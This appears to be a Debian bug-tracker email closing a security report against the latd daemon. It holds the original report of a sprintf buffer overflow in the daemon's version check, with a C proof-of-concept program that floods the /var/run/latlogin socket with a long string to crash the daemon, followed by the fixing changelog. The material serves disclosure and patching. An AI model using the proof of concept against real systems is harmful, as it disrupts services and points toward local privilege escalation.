Your message dated Mon, 04 Feb 2013 12:17:29 +0000
with message-id <e1u2kzj-0006tu...@franck.debian.org>
and subject line Bug#699625: fixed in latd 1.31
has caused the Debian Bug report #699625,
regarding unix socket privilege escalation
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
699625: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699625
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: latd
Version: 1.30
Severity: critical
Tags: security
-- System Information:
Debian Release: 7.0
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages latd depends on:
ii libc6 2.13-37
ii libgcc1 1:4.7.2-5
ii liblockdev1 1.0.3-1.5
ii libstdc++6 4.7.2-5
latd recommends no packages.
latd suggests no packages.
-- no debconf information
latd has a buffer overflow vulnerability @ llogincircuit.cc
case LATCP_VERSION:
if (strcmp(VERSION, (char*)cmdbuf) == 0)
{
state = RUNNING; // Versions match
send_reply(LATCP_VERSION, VERSION, -1);
}
else
{
char error[1024];
debuglog(("Connect from invalid llogin version %s\n", cmdbuf));
sprintf(error, "llogin version %s does not match latd version "
VERSION, cmdbuf); //***** overflow here
This vulnerability can trigger arbitrary code execution for an unprivileged
user. I am attaching an example payload that crashes latd daemon.
#include <stdio.h>
#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <stdlib.h>
int send_msg(int fd, int cmd, char *buf, int len)
{
unsigned char outhead[3];
outhead[0] = cmd;
outhead[1] = len/256;
outhead[2] = len%256;
if (write(fd, outhead, 3) != 3) return 0;
if (write(fd, buf, len) != len) return 0;
return 1;
}
int main()
{
int s = socket( PF_UNIX, SOCK_STREAM, 0 );
struct sockaddr_un sockaddr;
const char* str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
strcpy(sockaddr.sun_path, "/var/run/latlogin");
sockaddr.sun_family = AF_UNIX;
if ( connect( s, (struct sockaddr *)&sockaddr, sizeof(sockaddr)) )
{
perror( "connect" );
exit( -1 );
}
send_msg( s, 0x8, (char*) str, strlen( str ) );
return 0;
}
--- End Message ---
--- Begin Message ---
Source: latd
Source-Version: 1.31
We believe that the bug you reported is fixed in the latest version of
latd, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 699...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Christine Caulfield <christine.caulfi...@googlemail.com> (supplier of updated
latd package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Sun, 6 Dec 2013 11:32:08 +0000
Source: latd
Binary: latd
Architecture: source i386
Version: 1.31
Distribution: unstable
Urgency: low
Maintainer: Christine Caulfield <chris...@debian.org>
Changed-By: Christine Caulfield <christine.caulfi...@googlemail.com>
Description:
latd - LAT (Local Area Transport) Daemon
Closes: 699625
Changes:
latd (1.31) unstable; urgency=low
.
* Don't crash if we are fed a malicious version number.
Closes: #699625
* Fix some Lintian errors regarding LSB and build flags
Checksums-Sha1:
7905bb7a8752fee788a96a91ba53a78e3deff42c 739 latd_1.31.dsc
ef493493341c2c9bfc3ec709107846c33c70825f 515171 latd_1.31.tar.gz
8231ad1cbf5e2c1d3e364ee70610f73cd9c04e2b 92922 latd_1.31_i386.deb
Checksums-Sha256:
43861c390ad62fd4e91645e296b396d677b818de8656e0339991498e3f7e439d 739
latd_1.31.dsc
6839a48d60ee52d51c1cf1a4303459d55ab6d256fdba1ac2f5478c50796deaa0 515171
latd_1.31.tar.gz
94c7a68088bf8278967314320f9bae9eaff679c084f3707f9e6154bc0a17ffa6 92922
latd_1.31_i386.deb
Files:
2f562a15b75045415b08e6aef7e5c226 739 net extra latd_1.31.dsc
d2d4caeca72d0e640ebbe3f63d90f42e 515171 net extra latd_1.31.tar.gz
e09e7fc4b27d35aec417cccfcebfa563 92922 net extra latd_1.31_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlEPpFMACgkQhej7/PCycRNyaACfR0vU3OZ7oNx8dbr2npTKiB2x
e3sAmgKVnEoL6ItUnFfrqvn81OahDkTp
=UHdz
-----END PGP SIGNATURE-----
--- End Message ---
